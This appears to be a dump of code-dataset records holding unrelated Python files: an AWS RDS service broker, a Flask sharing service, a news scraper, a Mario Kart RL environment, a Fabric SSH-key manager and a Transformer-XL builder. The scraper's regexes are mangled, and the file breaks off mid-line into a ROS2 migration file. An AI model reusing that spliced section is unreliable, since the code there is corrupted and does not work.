both sync and async requests.\n # Ideally this would be async only since the operation is actually\n # async, but in at least v208 (probably some later versions as\n # well) it seems that the cloud controller does not include the\n # accepts_incomplete param in the request. The last_operation\n # endpoint supports async deprovisions so this should \"just work\"\n # with either sync or async operations. The main difference is\n # that the dynamodb reference will be removed here instead of\n # opportunistically by the last_operation endpoint.\n incompletes = bottle.request.query.getone('accepts_incomplete')\n bottle.response.content_type = 'application/json'\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n record = table.get_item(Key={'instance_id': instance_id})\n if 'Item' not in record.keys():\n bottle.response.status = 410\n return json.dumps({})\n record = record.pop('Item')\n record['last_operation'] = 'destroy'\n rds = RDS(DBInstanceIdentifier=record['hostname'], **CONFIG['aws'])\n rds.destroy_instance()\n if incompletes.lower() == 'true':\n bottle.response.status = 202\n table.put_item(Item=record)\n else:\n bottle.response.status = 200\n table.delete_item(Key={'instance_id': instance_id})\n return json.dumps({})\n\n\n@bottle.route('/v2/service_instances/'\n '/service_bindings/', method='PUT')\n@bottle.auth_basic(authenticate)\ndef bind(instance_id, binding_id):\n \"\"\"Return credentials for the service to the cloud controller for app\n binding to the service.\n \"\"\"\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n record = table.get_item(Key={'instance_id': instance_id})\n if 'Item' not in record.keys():\n bottle.response.status = 410\n return json.dumps({})\n record = record.pop('Item')\n if binding_id not in record['binding_ids']:\n record['binding_ids'].append(binding_id)\n table.put_item(Item=record)\n with utils.Crypt(iv=record['iv'], key=CONFIG['encryption_key']) as c:\n creds = json.loads(c.decrypt(record['credentials']))\n bottle.response.status = 201\n bottle.response.content_type = 'application/json'\n return json.dumps({'credentials': creds})\n\n\n@bottle.route('/v2/service_instances/'\n '/service_bindings/', method='DELETE')\n@bottle.auth_basic(authenticate)\ndef unbind(instance_id, binding_id):\n \"\"\"Unbind the service credentials from the application\n \"\"\"\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n record = table.get_item(Key={'instance_id': instance_id})\n if 'Item' in record.keys():\n record = record.pop('Item')\n for index, value in enumerate(record['binding_ids']):\n if value == binding_id:\n del record['binding_ids'][index]\n table.put_item(Item=record)\n bottle.response.status = 200\n response = {}\n bottle.response.content_type = 'application/json'\n return json.dumps(response)\n\n\n@bottle.route('/v2/service_instances/'\n '/last_operation', METHOD='GET')\n@bottle.auth_basic(authenticate)\ndef last_operation(instance_id):\n \"\"\"Check on the state of the async provisioning operation\n \"\"\"\n bottle.response.content_type = 'application/json'\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n record = table.get_item(Key={'instance_id': instance_id})\n if 'Item' not in record.keys():\n bottle.response.status = 410\n return 
json.dumps({})\n record = record.pop('Item')\n rds = RDS(name=record['hostname'], **CONFIG['aws'])\n if record['last_operation'] == 'create':\n return create_polling(record)\n elif record['last_operation'] == 'create_from_snapshot':\n return create_from_snapshot_polling(record)\n elif record['last_operation'] == 'destroy':\n return destroy_polling(record)\n elif record['last_operation'] == 'update':\n return update_polling(record)\n else:\n # If last operation is in an unknown state return 410.\n bottle.response.status = 410\n return json.dumps({})\n\n\ndef create_polling(record):\n \"\"\"Last operation polling logic for create action.\n \"\"\"\n bottle.response.content_type = 'application/json'\n try:\n rds = RDS(name=record['hostname'], **CONFIG['aws'])\n filters = {'DBInstanceIdentifier': record['hostname']}\n details = rds.rds_conn.describe_db_instances(**filters)\n details = details['DBInstances'][0]\n except botocore.exceptions.ClientError as e:\n # This exception will be raised if nothing matches the filter.\n if e.response['Error']['Code'] == 'DBInstanceNotFound':\n bottle.response.status = 410\n return json.dumps({})\n else:\n raise\n if details['DBInstanceStatus'] == 'available':\n # If the instance is available, pull the credentials\n # blob out of the record, decrypt it, update it with\n # the new information, encrypt it, and update dynamodb,\n # and return success for instance provision.\n with utils.Crypt(iv=record['iv'],\n key=CONFIG['encryption_key']) as c:\n creds = c.decrypt(record['credentials'])\n creds = json.loads(creds)\n creds['hostname'] = details['Endpoint']['Address']\n uri = '{0}://{1}:{2}@{3}:{4}/{5}'.format(\n details['Engine'].lower(),\n creds['username'],\n creds['password'],\n creds['hostname'],\n creds['port'],\n creds['db_name']\n )\n creds['uri'] = uri\n with utils.Crypt(iv=record['iv'],\n key=CONFIG['encryption_key']) as c:\n creds = c.encrypt(json.dumps(creds))\n record['credentials'] = creds\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n table.put_item(Item=record)\n response = {'state': 'succeeded',\n 'description': 'Service Created.'}\n bottle.response.status = 200\n return json.dumps(response)\n else:\n # If the RDS instance is in a state other than available\n # then return the state as 'in progress' and the actual\n # status for the instance in the message. 
This will\n # cause the cloud controller to continue polling until\n # the RDS instance is available for use.\n msg = ('RDS Instance is currently in the {0} '\n 'state.'.format(details['DBInstanceStatus']))\n response = {'state': 'in progress', 'description': msg}\n bottle.response.status = 200\n return json.dumps(response)\n\n\ndef create_from_snapshot_polling(record):\n \"\"\"Last operation polling logic for create_from_snaphost action.\n \"\"\"\n bottle.response.content_type = 'application/json'\n try:\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n rds = RDS(name=record['hostname'], **CONFIG['aws'])\n filters = {'DBInstanceIdentifier': record['hostname']}\n details = rds.rds_conn.describe_db_instances(**filters)\n details = details['DBInstances'][0]\n except botocore.exceptions.ClientError as e:\n # This exception will be raised if nothing matches the filter.\n if e.response['Error']['Code'] == 'DBInstanceNotFound':\n bottle.response.status = 410\n return json.dumps({})\n else:\n raise\n if record['step'] == 'deploy':\n if details['DBInstanceStatus'] == 'available':\n params = {'DBInstanceIdentifier': record['hostname']}\n params.update(record['params_to_update'])\n # Get the new password to pass along for modify.\n with utils.Crypt(iv=record['iv'],\n key=CONFIG['encryption_key']) as c:\n creds = json.loads(c.decrypt(record['credentials']))\n params['MasterUserPassword'] = creds['password']\n rds.update_instance(**params)\n record['step'] = 'modify'\n table.put_item(Item=record)\n msg = ('RDS Instance is currently in the {0} '\n 'state.'.format(details['DBInstanceStatus']))\n response = {'state': 'in progress', 'description': msg}\n bottle.response.status = 200\n return json.dumps(response)\n elif record['step'] == 'modify':\n if details['DBInstanceStatus'] == 'available':\n with utils.Crypt(iv=record['iv'],\n key=CONFIG['encryption_key']) as c:\n creds = json.loads(c.decrypt(record['credentials']))\n creds['hostname'] = details['Endpoint']['Address']\n uri = '{0}://{1}:{2}@{3}:{4}/{5}'.format(\n details['Engine'].lower(),\n creds['username'],\n creds['password'],\n creds['hostname'],\n creds['port'],\n creds['db_name']\n )\n creds['uri'] = uri\n with utils.Crypt(iv=record['iv'],\n key=CONFIG['encryption_key']) as c:\n creds = c.encrypt(json.dumps(creds))\n record['credentials'] = creds\n record['step'] = 'complete'\n table.put_item(Item=record)\n msg = ('RDS Instance is currently in the {0} '\n 'state.'.format(details['DBInstanceStatus']))\n response = {'state': 'in progress', 'description': msg}\n bottle.response.status = 200\n return json.dumps(response)\n elif record['step'] == 'complete':\n response = {'state': 'succeeded', 'description': 'Service Created.'}\n bottle.response.status = 200\n return json.dumps(response)\n else:\n msg = 'The instance failed to provision'\n response = {'state': 'failed', 'description': msg}\n bottle.response.status = 200\n return json.dumps(response)\n\n\ndef destroy_polling(record):\n \"\"\"Last operation polling logic for destroy action.\n \"\"\"\n rds = RDS(DBInstanceIdentifier=record['hostname'], **CONFIG['aws'])\n if record['hostname'] in rds.get_all_identifiers():\n response = {\n 'state': 'in progress',\n 'description': 'Destroying service.'\n }\n bottle.response.status = 200\n return json.dumps(response)\n else:\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n 
table.delete_item(Key={'instance_id': record['instance_id']})\n bottle.response.status = 410\n return json.dumps({})\n\ndef update_polling(record):\n \"\"\"Last operation polling logic for update action.\n \"\"\"\n rds = RDS(DBInstanceIdentifier=record['hostname'], **CONFIG['aws'])\n details = rds.db_instance_details()\n if details['DBInstanceStatus'] != 'available':\n response = {'state': 'in progress', 'description': 'Updating service.'}\n bottle.response.status = 200\n return json.dumps(response)\n else:\n response = {'state': 'succeeded', 'description': 'Service updated.'}\n bottle.response.status = 200\n return json.dumps(response)\n\nif __name__ == '__main__':\n init()\n port = int(os.getenv('PORT', '8080'))\n bottle.run(host='0.0.0.0', port=port, reloader=True)\nelse:\n init()\n bottle.install(_redirect_http_to_https)\n app = application = bottle.default_app()\n\n\n","sub_path":"rds_sb_app.py","file_name":"rds_sb_app.py","file_ext":"py","file_size_in_byte":23344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"20899977","text":"\"\"\"\nSharedField service\n\"\"\"\n\nfrom app import DB\nfrom app.models import SharedField\nfrom app.helper.decorators import transaction_decorator\nfrom app.helper.errors import SharedFieldNotExist\nfrom app.schemas import SharedFieldPostSchema, SharedFieldResponseSchema\n\n\nclass SharedFieldService:\n \"\"\"\n SharedField Service class\n \"\"\"\n\n @staticmethod\n @transaction_decorator\n def create(user_id, field_id, owner_id):\n \"\"\"\n SharedField model create method\n\n :param user_id: id of user object\n :param field_id: id of field object\n :param owner_id: owner of the field that's being shared\n :return: created SharedField instance\n \"\"\"\n\n shared_field = SharedField(user_id=user_id, field_id=field_id, owner_id=owner_id)\n DB.session.add(shared_field)\n return shared_field\n\n @staticmethod\n def get_by_id(shared_field_id):\n \"\"\"\n SharedField model get by id method\n\n :param shared_field_id: id of the SharedField instance\n :return: SharedField instance with a specific id or None\n \"\"\"\n\n shared_field = SharedField.query.get(shared_field_id)\n return shared_field\n\n @staticmethod\n def filter(shared_field_id=None, user_id=None, field_id=None, owner_id=None):\n \"\"\"\n SharedField model filter method\n\n :param shared_field_id: is of the SharedField instance\n :param user_id: id of the user object\n :param field_id: id of the field object\n :param owner_id: owner of the field that's being shared\n :return: list of SharedField instances\n \"\"\"\n filter_data = {}\n if shared_field_id is not None:\n filter_data['shared_field_id'] = shared_field_id\n if user_id is not None:\n filter_data['user_id'] = user_id\n if field_id is not None:\n filter_data['field_id'] = field_id\n if owner_id is not None:\n filter_data['owner_id'] = owner_id\n result = SharedField.query.filter_by(**filter_data).all()\n return result\n\n @staticmethod\n @transaction_decorator\n def delete(shared_field_id):\n \"\"\"\n SharedField delete method\n\n :param shared_field_id: id of the SharedField instance\n :return: True if shared_field was deleted\n \"\"\"\n\n shared_field = SharedFieldService.get_by_id(shared_field_id)\n if shared_field is None:\n raise SharedFieldNotExist()\n DB.session.delete(shared_field)\n return True\n\n @staticmethod\n def to_json(data, many=False):\n \"\"\"\n Get data in json format\n \"\"\"\n schema = SharedFieldPostSchema(many=many)\n return schema.dump(data)\n\n @staticmethod\n 
def response_to_json(data, many=False):\n \"\"\"\n Get response data in json format\n \"\"\"\n schema = SharedFieldResponseSchema(many=many)\n return schema.dump(data)\n\n @staticmethod\n def get_by_user_and_field(user_id, field_id):\n \"\"\"\n Get SharedField instance by user_id and field_id\n\n :param user_id: id of the user to whom the field was shared to\n :param field_id: id of the field that was shared\n :return: SharedField instance or None\n \"\"\"\n shared_field_instance = SharedField.query.filter_by(\n user_id=user_id,\n field_id=field_id\n ).first()\n return shared_field_instance\n\n @staticmethod\n def validate_post_data(data):\n \"\"\"\n Validate data by SharedFieldPostSchema\n \"\"\"\n schema = SharedFieldPostSchema()\n errors = schema.validate(data)\n return (not bool(errors), errors)\n","sub_path":"src/app/services/shared_field.py","file_name":"shared_field.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"58777116","text":"# coding=utf-8\nimport requests\nimport re\nimport json\nfrom lxml import etree\nfrom pymysql import *\nimport datetime\nimport time\nclass NewsSpider:\n def __init__(self):\n self.start_url = \"https://api.jinse.com/v4/information/list/?catelogue_key=tech&information_id=0&limit=20&flag=down&version=9.9.9\"\n self.next_url_temp = \"https://api.jinse.com/v4/information/list/?catelogue_key=tech&information_id={}&limit=20&flag=down&version=9.9.9\"\n self.headers= {\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36\"}\n self.session = requests.session()\n self.proxies = proxies = {\"http\":\"http://39.137.46.70:8080\"}\n def parse_url(self,url):\n response = self.session.get(url,headers=self.headers,proxies = self.proxies)\n return response.content.decode()\n\n def get_first_page_content_list(self,html_str): #提取第一页的url和最后一个信息的id\n html = etree.HTML(html_str)\n div_list = html.xpath(\"//div[@class='article-main']/div[1]\")\n content_list = []\n for div in div_list:\n item = {}\n item['data_url'] = div.xpath('./ol/a/@href')\n # print(item['data_url'])\n item['data-information-id'] = div.xpath('//ol/@data-information-id')[-1]\n # print( item['data-information-id'])\n content_list.append(item)\n url_list = content_list[0]['data_url']\n\n # print(url_list)\n return content_list,url_list\n # return item['data-information-id'],item['data_url']\n\n\n\n def get_detail_page(self,html_list):\n # print(html_list)\n item = {}\n content1 = re.sub(r\"\\\\n
    \\\\n\\\\n|width=\\\"\\d+\\\" height=\\\"\\d+\\\"\", \"\",str(re.findall(r'.*?(.*?)', html_list, re.DOTALL)))\n content3 = re.sub(r\"

    \", \"

    \", content1)\n # print(type(content1))\n content2 = re.sub(r\"< img src=\",\" : }\n \"\"\"\n\n #combine packages from official status, unofficial, and ignored\n packages = get_unofficial_status()\n packages.update(get_ros2_release())\n packages.update(get_ignore_packages())\n\n statuses = {}\n for pkg in pkgs:\n statuses[pkg] = packages.get(pkg, MigrationStatus.not_migrated)\n\n return statuses\n","sub_path":"ros2_migration/effort_estimation/ros2_release_checker.py","file_name":"ros2_release_checker.py","file_ext":"py","file_size_in_byte":4584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"123675461","text":"import random\nimport numpy as np\nimport screengrab as sg\nimport readmem as rm\nimport inputs as input_wrapper\nimport utils as utils\nimport time\n\nclass ActionSpace():\n def __init__(self):\n self.size = input_wrapper.get_input_count()\n\n def get_size(self):\n return self.size\n\n def sample(self):\n return np.random.randint(0, self.size)\n\nclass Env():\n def __init__(self, done_steps = 100, pid = None):\n self.pid = int(pid)\n self.done_counter = 0\n self.max_steps = done_steps\n self.done = False\n self.rank = 5\n self.action_space = ActionSpace()\n\n # start the stuff\n self._start_kart()\n\n self.set_rank()\n self.rank = None\n self.previous_rank = self.rank\n\n def _start_kart(self):\n input_wrapper.reset()\n\n sg.init()\n window = utils.find_window('.*Mkart.*')\n hier = utils.get_hier(window)\n geometry = utils.get_geometry(hier[1])\n\n # tweak for half screen view and kill menubar\n geometry['y'] += 30\n geometry['h'] = 105\n geometry['w'] -= 5\n\n self.geometry = geometry\n\n im = sg.grab_screen_grey(geometry['x'], geometry['y'], geometry['w'], geometry['h'])\n im = sg.get_image_grey(geometry['w'], geometry['h'], im)\n im.save('./output/test.png', 'PNG')\n\n with open('/proc/{}/maps'.format(self.pid)) as f:\n for line in f.readlines():\n if '[heap]' in line:\n heap_start = line.split('-')[0]\n heap_start = int(heap_start, 16)\n\n self.heap_start = heap_start\n break\n\n def reset(self):\n self.done = False\n input_wrapper.focus(self.geometry)\n input_wrapper.release()\n input_wrapper.reset()\n time.sleep(0.25)\n self.previous_rank = self.rank = 5 # TODO magic number\n\n def get_done(self):\n return self.get_rank() == 8\n\n def set_rank(self):\n self.previous_rank = self.rank\n rank = rm.get_player_rank(self.pid, self.heap_start)\n rank &= 0xff\n if rank > 0 and rank < 9:\n self.rank = rank\n return\n\n def set_done(self):\n self.done = self.rank == 8\n\n def get_position_reward(self, rank, previous_rank):\n if not rank or not previous_rank: return 0\n\n if rank == previous_rank:\n return 1\n if rank < previous_rank:\n return 10\n if rank > previous_rank:\n return -100\n\n def get_reward(self, rank, previous_rank):\n b_mod = 0\n\n if 'b' in input_wrapper.get_pressed():\n # give extra points for mashing B\n b_mod = 1\n\n return b_mod + self.get_position_reward(rank, previous_rank)\n\n def get_pixel_data(self):\n return sg.grab_screen_grey(\n self.geometry['x'],\n self.geometry['y'],\n self.geometry['w'],\n self.geometry['h'])\n\n def get_action_size(self):\n return self.action_space.get_size()\n\n def get_input_shape(self):\n return self.get_screen().shape\n\n def get_screen(self):\n return np.reshape(self.get_pixel_data(), [self.geometry['w'], self.geometry['h'], 1])\n\n def do_action(self, action):\n input_wrapper.do_input(action)\n\n def step(self, action):\n if action is not None: self.do_action(action)\n 
self.set_rank()\n self.set_done()\n\n observation = self.get_screen()\n reward = self.get_reward(self.rank, self.previous_rank)\n done = self.done\n info = None\n\n return (observation, reward, done, info)\n","sub_path":"src/environments/kart.py","file_name":"kart.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"338884489","text":"def word_2_list(word):\n list = []\n for letter in word:\n list.append(letter)\n list.sort()\n return(list)\n\nfilename = './com_test.txt'\ncombinations = []\nf = open(filename, 'r')\nlines = f.readlines()\nfor line in lines:\n combinations.append(line[:-1]) #[:-1]で改行\"\"\\n\"を取り除く\nf.close()\n\nletters = input(\"何か5文字 >\")\nl_original = word_2_list(letters)\n\nl = []\nfor com in combinations:\n #print(com)\n l_in = l_original\n #print(\"まずはそのまま l_in:\", l_in)\n for i in range(len(com)):\n if com[i] == \"1\":\n #print(i,\"に1\")\n l_in_left = l_in[:i]\n l_in_right = l_in[i+1:]\n l_in = l_in_left\n l_in.append(\"\")\n l_in.extend(l_in_right)\n #print(l_in, \"に l_in を変更\")\n #print(\"空白除去前のl_in:\", l_in)\n while True:\n try:\n l_in.remove(\"\")\n except ValueError:\n break\n #print(\"空白除去後のl_in:\", l_in, \"\\n\")\n if l_in != []:\n l.append(l_in)\n\nfor item in l:\n print(item)\n\n#l_in_each\n","sub_path":"select_letter.py","file_name":"select_letter.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"612760492","text":"#!/usr/bin/env python3\n\nfrom collections import defaultdict, Counter\nimport argparse\nimport hashlib\nimport itertools\nimport json\nimport random\nimport string\nimport sys\nimport pprint\nimport operator\n\n\nREDUNDANCY = 8\nTERMINATOR = '_'\nCOLORS = ['maroon', 'purple', 'blue', 'pink', 'green']\nSHAPES = ['circle', 'rectangle', 'triangle', 'pentagon', 'star']\n\npatterns = list(itertools.product(itertools.product(SHAPES, COLORS), repeat=3))\n\ndef gen_character_mapping(key):\n random.seed(str(key))\n characters = string.ascii_lowercase + ' .?!' 
+ TERMINATOR\n character_patterns = random.sample(patterns, len(characters))\n return dict(zip(characters, character_patterns))\n\ndef encode(user_input):\n key = random.choice(patterns)\n mapping = gen_character_mapping(key)\n\n key_list = [[' '.join(x) for x in key]]\n terminator_list = [[' '.join(x) for x in mapping[TERMINATOR]]]\n mapping_list = [[' '.join(x) for x in mapping[char]] for char in user_input]\n input_to_patterns = key_list + mapping_list + terminator_list\n\n print(json.dumps(input_to_patterns))\n \ndef column(matrix, i):\n return [row[i] for row in matrix]\n\ndef decode(input_message):\n message_concat = [] \n for i in range(len(input_message)):\n message_concat.append([])\n for j in range(len(input_message[i])):\n msg = input_message[i][j][2].lower()\n if (msg.split(' ')[0] != ''):\n message_concat[i].append(input_message[i][j][2].lower())\n formatted_message = list(filter(lambda x: len(x) == 24, message_concat))\n encodedMessage = []\n # decodedMessage = defaultdict(int)\n for msg in formatted_message:\n new_message = []\n for i in range(8):\n new_message.append(tuple(map(lambda x: tuple(x.split(\" \")), msg[i * 3 : i * 3 + 3])))\n encodedMessage.append(tuple(new_message))\n decodedMainArray = [[] for i in range(len(encodedMessage) - 2)]\n for i in range(8):\n msg = decode_message(column(encodedMessage, i))\n for i in range(len(msg)):\n decodedMainArray[i].append(msg[i])\n # pprint.pprint(decodedMainArray)\n \n decodedMessage = \"\"\n for i in range(len(decodedMainArray)):\n a = filter(lambda x: x != '_', decodedMainArray[i])\n # most_common, num_most_common = Counter(a).most_common(1)[0]\n # print(most_common, num_most_common)\n decodedMessage += Counter(a).most_common(1)[0][0]\n return decodedMessage\n \ndef decode_message(encoded_characters):\n key = encoded_characters[0]\n mapping = gen_character_mapping(key) \n # if mapping[TERMINATOR] != encoded_characters[-1]:\n # print(encoded_characters[-1], '\\n', mapping[TERMINATOR])\n # key = encoded_characters[-1]\n # mapping = gen_character_mapping(key)\n # if mapping[TERMINATOR] != encoded_characters[0]:\n # return 'Could not decode message' \n # encoded_characters = encoded_characters[::-1]\n mapping = dict(map(reversed, mapping.items()))\n decodedArray = []\n for char in encoded_characters[1:-1]:\n if char not in mapping:\n decodedArray += \"_\"\n else: \n decodedArray += mapping[char]\n return decodedArray\n\n\ndef main():\n parser = argparse.ArgumentParser()\n action_group = parser.add_mutually_exclusive_group(required=True)\n action_group.add_argument('-d', '--decode')\n args = parser.parse_args()\n \n if args.decode:\n decode(args.decode)\n else:\n raise ValueError\n\nif __name__ == '__main__':\n main()\n","sub_path":"decoderFiles/randomizedDecoder.py","file_name":"randomizedDecoder.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"611697594","text":"from fabric.api import env\nfrom fabric.colors import green, blue, yellow\nfrom fabric.context_managers import quiet\nfrom fabric.decorators import task\nfrom fabric.operations import prompt\n\nfrom keymanager import KeysFile\n\n\n@task\ndef list_users():\n \"\"\"\n Read the contents of a servers authorized_keys file\n\n e.g: fab list_users --hosts david@127.0.0.1\n\n \"\"\"\n with quiet():\n keyfile = KeysFile()\n\n print(green('\\n================== {}:'.format(env.host_string)))\n for user in keyfile.users:\n print(blue('\\t ' + user.name))\n\n\n@task\ndef 
add_user():\n \"\"\"\n Add a user to a server using the given identity file\n\n e.g fab add_user --hosts david@127.0.0.1\n\n \"\"\"\n with quiet():\n keyfile = KeysFile()\n user = prompt(green(\"Paste key or file path:\") + \"\\n\\n\",\n validate=keyfile.validate_user)\n\n if keyfile.add_user(user):\n print(green('{} authorized'.format(user.name, env.host_string)))\n else:\n print(yellow('{} already authorized, skipping'.format(user.name)))\n\n\n@task\ndef delete_user(username=None):\n \"\"\"\n Remove a user from a server\n\n e.g fab delete_user --hosts david@127.0.0.1\n\n \"\"\"\n with quiet():\n keyfile = KeysFile()\n\n if not username:\n username = prompt(green(\"Username: \"))\n\n removed = keyfile.delete_user(username)\n\n if removed:\n print(green('{} removed'.format(username, env.host_string)))\n else:\n print(yellow('{} not in keys, skipping'.format(username)))\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"411234857","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom tensorflow.python import keras\nfrom keras_adaptive_softmax import AdaptiveEmbedding, AdaptiveSoftmax\nfrom keras_layer_normalization import LayerNormalization\nfrom keras_position_wise_feed_forward import FeedForward\n# from tensorflow.python.keras.layers import Embedding\nfrom .contrib import Scale, Memory, PositionalEmbedding, RelativeBias, RelativePartialMultiHeadSelfAttention\n\n\ndef get_custom_objects():\n return {\n 'AdaptiveEmbedding': AdaptiveEmbedding,\n 'AdaptiveSoftmax': AdaptiveSoftmax,\n 'Scale': Scale,\n 'Memory': Memory,\n 'LayerNormalization': LayerNormalization,\n 'FeedForward': FeedForward,\n 'PositionalEmbedding': PositionalEmbedding,\n 'RelativeBias': RelativeBias,\n 'RelativePartialMultiHeadSelfAttention': RelativePartialMultiHeadSelfAttention,\n }\n\n\ndef set_custom_objects():\n for name, layer in get_custom_objects().items():\n keras.utils.get_custom_objects()[name] = layer\n\nclass MemorySequence(keras.utils.Sequence):\n\n def __init__(self,\n model: keras.models.Model,\n sequence: keras.utils.Sequence,\n target_len: int):\n \"\"\"Initialize the sequence.\n\n :param model: The built model.\n :param sequence: The original sequence.\n :param target_len: The length of prediction.\n \"\"\"\n self.model = model\n self.sequence = sequence\n self.target_len = target_len\n\n self.indice = []\n for i in range(len(sequence)):\n item = sequence[i]\n length = self._get_first_shape(item)[1]\n number = (length + target_len - 1) // target_len\n for j in range(number):\n self.indice.append((i, j))\n\n self.last_index, self.last_item = -1, None\n\n self.memory_length_index = None\n for i, input_layer in enumerate(model.inputs):\n name = input_layer.name.split(':')[0].split('/')[0]\n if name.startswith('Input-Memory-Length'):\n self.memory_length_index = i\n break\n\n def __len__(self):\n return len(self.indice)\n\n def __getitem__(self, index):\n sub_index, sub_num = self.indice[index]\n if sub_index == self.last_index:\n item = self.last_item\n else:\n item = self.sequence[sub_index]\n self.last_index = sub_index\n self.last_item = item\n start = sub_num * self.target_len\n stop = start + self.target_len\n s = slice(start, stop)\n batch_size = self._get_first_shape(item)[0]\n\n if isinstance(item[0], (list, tuple)):\n inputs = [self._pad_target(sub_item[:, s, ...]) for sub_item in item[0]]\n else:\n inputs = 
[self._pad_target(item[0][:, s, ...])]\n memory_length_input = np.ones(batch_size) * sub_num * self.target_len\n inputs = inputs[:self.memory_length_index] + [memory_length_input] + inputs[self.memory_length_index:]\n\n if isinstance(item[1], (list, tuple)):\n outputs = [self._pad_target(sub_item[:, s, ...]) for sub_item in item[1]]\n else:\n outputs = self._pad_target(item[1][:, s, ...])\n return inputs, outputs\n\n @staticmethod\n def _get_first_shape(item):\n if isinstance(item[0], (list, tuple)):\n return item[0][0].shape\n return item[0].shape\n\n def _pad_target(self, item: np.ndarray):\n length = item.shape[1]\n if length != self.target_len:\n if item.ndim == 2:\n return np.pad(item, ((0, 0), (0, self.target_len - length)), 'constant', constant_values=0)\n return np.pad(item, ((0, 0), (0, self.target_len - length), (0, 0)), 'constant', constant_values=0)\n return item\n\ndef build_transformer_xl(units,\n embed_dim,\n hidden_dim,\n num_token,\n num_block,\n num_head,\n batch_size,\n memory_len,\n target_len,\n dropout=0.0,\n attention_dropout=0.0,\n cutoffs=None,\n div_val=1,\n force_projection=None,\n bind_embeddings=True,\n bind_projections=True,\n clamp_len=None,\n share_biases=True):\n \"\"\"Build transformer-XL model.\n\n :param units: Units inside the transformer.\n :param embed_dim: Dimension of embeddings.\n :param hidden_dim: Dimension inside position-wise feed-forward layer.\n :param num_token: Number of distinct input tokens.\n :param num_block: Number of basic encoder blocks.\n :param num_head: Number of heads for attention.\n :param batch_size: Maximum batch size.\n :param memory_len: The maximum length of memories.\n :param target_len: The length of prediction block.\n :param dropout: General dropout rate.\n :param attention_dropout: Dropout rate inside attention layer.\n :param cutoffs: Cutoffs of adaptive embedding.\n :param div_val: Scale factor of adaptive embedding.\n :param force_projection: Add projection when the dimensions are equal.\n :param bind_embeddings: Whether to bind embeddings to adaptive softmax.\n :param bind_projections: Whether to bind projections to adaptive softmax.\n :param clamp_len: The maximum value of relative position.\n :param share_biases: Whether to use the same biases for all layers.\n :return: The built model.\n \"\"\"\n token_input = keras.layers.Input(shape=(target_len,), name='Input-Token')\n memory_length_input = keras.layers.Input(shape=(1,), name='Input-Memory-Length')\n inputs = [token_input, memory_length_input]\n\n results = AdaptiveEmbedding(\n input_dim=num_token,\n output_dim=units,\n embed_dim=embed_dim,\n cutoffs=cutoffs,\n div_val=div_val,\n mask_zero=True,\n force_projection=force_projection,\n return_embeddings=True,\n return_projections=True,\n name='Embed-Token',\n )(token_input)\n token_embed, embedding_weights = results[0], results[1:]\n token_embed = Scale(scale=np.sqrt(units), name='Embed-Token-Scaled')(token_embed)\n last_memory = Memory(\n batch_size=batch_size,\n memory_len=memory_len,\n target_len=target_len,\n output_dim=units,\n name='Memory-0',\n )([token_embed, memory_length_input])\n\n position_embed = PositionalEmbedding(\n output_dim=units,\n clamp_len=clamp_len,\n name='Embed-Position',\n )([token_input, last_memory])\n\n if 0.0 < dropout < 1.0:\n token_embed = keras.layers.Dropout(rate=dropout, name='Embed-Token-Dropped')(token_embed)\n position_embed = keras.layers.Dropout(rate=dropout, name='Embed-Position-Dropped')(position_embed)\n\n context_bias, relative_bias = None, None\n if share_biases:\n 
context_bias, relative_bias = RelativeBias(units=units, name='Biases')(last_memory)\n\n outputs = [token_embed]\n for i in range(num_block):\n block_input, block_output = outputs[-1], outputs[-1]\n if not share_biases:\n context_bias, relative_bias = RelativeBias(units=units, name='Biases-{}'.format(i + 1))(last_memory)\n block_output = RelativePartialMultiHeadSelfAttention(\n units=units,\n num_head=num_head,\n use_bias=False,\n attention_dropout=attention_dropout,\n name='Attention-{}'.format(i + 1),\n )([block_output, position_embed, last_memory, context_bias, relative_bias])\n block_output = keras.layers.Add(name='Attention-Res-{}'.format(i + 1))([block_input, block_output])\n if 0.0 < dropout < 1.0:\n block_output = keras.layers.Dropout(rate=dropout, name='Attention-Dropped-{}'.format(i + 1))(block_output)\n block_output = LayerNormalization(name='Attention-Norm-{}'.format(i + 1))(block_output)\n\n block_input = block_output\n block_output = FeedForward(\n units=hidden_dim,\n dropout_rate=dropout,\n name='FeedForward-{}'.format(i + 1),\n )(block_output)\n block_output = keras.layers.Add(name='FeedForward-Res-{}'.format(i + 1))([block_input, block_output])\n if 0.0 < dropout < 1.0:\n block_output = keras.layers.Dropout(rate=dropout, name='FeedForward-Dropped-{}'.format(i + 1))(block_output)\n block_output = LayerNormalization(name='FeedForward-Norm-{}'.format(i + 